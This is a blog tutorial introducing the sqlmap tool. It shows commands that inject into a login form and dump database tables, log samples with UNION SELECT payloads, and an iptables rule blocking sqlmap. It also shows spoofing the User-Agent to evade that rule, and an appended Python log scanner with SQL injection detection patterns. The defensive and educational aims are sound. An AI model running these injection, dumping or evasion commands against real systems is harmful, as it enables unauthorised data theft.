Recently, I was doing a CTF (article here) and used sqlmap for the first time. When I used it, I wasn’t too sure what all was going on, so I thought it would be a good idea to do a writeup about it. I’ve decided to make a new series called “Tool Time” where I introduce you (and sometimes me) to a security tool. In general, these articles will serve as a good introduction to the tool (basic source data, how to use it and some random information).
I’m going to attempt to develop out a format for these articles for consistency. As this is the first one, future articles may change.
Better Know Your Tool
Site: sqlmap on GitHub
Language: Python (2.6.x and 2.7.x)
Kali included: yes (just run sqlmap)
What is sqlmap?
It’s a tool to detect and exploit SQL injection vulnerabilities in database servers.
This tool can do a lot, so it’s best to spend some time looking into all of the options.
$ sqlmap -hh
That command (or python sqlmap.py -hh) will give you all of the options/switches. You can use -h instead, which will give you less information.
If you want to see all of the features, take a look at their wiki. There’s a lot listed.
Sqlmap supports many database management systems, such as MySQL, Oracle, Microsoft SQL Server, etc.
It can enumerate users, password hashes, tables, columns and more. It can also connect directly to the DB.
And it can search for specific database names, tables and columns.
Here’s a quick example of using sqlmap.
Getting initial DB information:
$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit"
Getting a list of databases on the system (MySQL):
$ sqlmap -u "http://mytarget/login.php" --data="user=1&password=1&s=Submit" --dbms=mysql --dbs
Getting tables inside of a database (MyWordpressDB):
$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --tables -D MyWordpressDB
Getting data inside of a table (users):
$ sqlmap -u http://mytarget/login.php --data="user=1&password=1&s=Submit" --dbms=mysql --dump -T users -D MyWordpressDB
Another example would be just pointing -u to a page that takes a GET parameter and going from there.
Using sqlmap is pretty loud. I pointed it at my test WordPress VM and just ran the initial check (telling sqlmap that I was using MySQL).
The result was something like 100+ log entries instantly like this:
192.168.119.128 - - [01/Aug/2015:16:23:38 -0700] "POST /wp-login.php HTTP/1.1" 200 1568 "-" "sqlmap/1.0-dev-nongit-20150719 (http://sqlmap.org)"
After testing this tool against one of my VMs, my next task was to update my iptables rules to detect sqlmap.
Here’s a real quick n dirty example:
$ sudo iptables -I INPUT -p tcp --dport 80 -m string --algo bm --string "sqlmap.org" -j DROP
This rule looks for the string sqlmap.org in TCP traffic to port 80 and drops any packet that contains it. Of course, if a legitimate request happens to come in with that text, it’s gone too.
So now that sqlmap is blocked, what now? Random agents.
$ sqlmap -u "http://192.168.119.134/?s=lkk" --dbms=MySQL --random-agent
And now the log will look something like:
192.168.119.128 - - [01/Aug/2015:17:12:13 -0700] "GET /?s=lkk%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 3308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:18.104.22.168) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6"
Options of interest here:
- --random-agent (use a randomly selected HTTP UA value)
- --user-agent=WHATEVER (pass in a specific UA to use)
- --host=WHATEVER (HTTP Host header value)
- --referer=WHATEVER (HTTP Referer value)
- --proxy=PROXY (use a proxy to connect to the target)
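Since every one of those headers is under the client's control, detection is better keyed on the request itself. The following is an added example (not from sqlmap or the original article) that scans Apache combined-format access logs for both the default sqlmap User-Agent and the payload shape visible in the second log line above; the regex patterns and the sample lines are constructed assumptions modelled on the two log entries shown earlier.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Apache "combined" format, the format of the log lines shown above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Heuristic payload shapes (assumed patterns, tune them for your own traffic).
PAYLOADS = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "null-column-probe": re.compile(r"(null\s*,\s*){3,}null", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
}

def classify(line):
    """Return (ip, [reasons]) for one access-log line, or None if unparseable."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    reasons = ["ua-sqlmap"] if "sqlmap" in m["ua"].lower() else []
    # Decode twice so double-encoded payloads (%2520) are normalised as well.
    uri = unquote_plus(unquote_plus(m["uri"]))
    reasons += [name for name, rx in PAYLOADS.items() if rx.search(uri)]
    return m["ip"], reasons

def summarize(lines):
    """Count detection reasons per client IP; clients with no hits are omitted."""
    hits = defaultdict(Counter)
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            hits[parsed[0]].update(parsed[1])
    return {ip: dict(counts) for ip, counts in hits.items()}

# Constructed sample: the article's two log lines (payload shortened) plus one benign search.
SAMPLE = [
    '192.168.119.128 - - [01/Aug/2015:16:23:38 -0700] "POST /wp-login.php HTTP/1.1" 200 1568 "-" "sqlmap/1.0-dev-nongit-20150719 (http://sqlmap.org)"',
    '192.168.119.128 - - [01/Aug/2015:17:12:13 -0700] "GET /?s=lkk%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 3308 "-" "Mozilla/5.0 (Windows NT 5.1) Firefox/3.5.6"',
    '192.168.119.1 - - [01/Aug/2015:17:13:02 -0700] "GET /?s=union+square+hotels HTTP/1.1" 200 3308 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/39.0"',
]

if __name__ == "__main__":
    for ip, reasons in summarize(SAMPLE).items():
        print(ip, reasons)
```

The POST line is flagged only because of its User-Agent: access logs do not record request bodies, so POST-based injection with a spoofed UA needs body inspection (a WAF or application-level logging) to be seen at all.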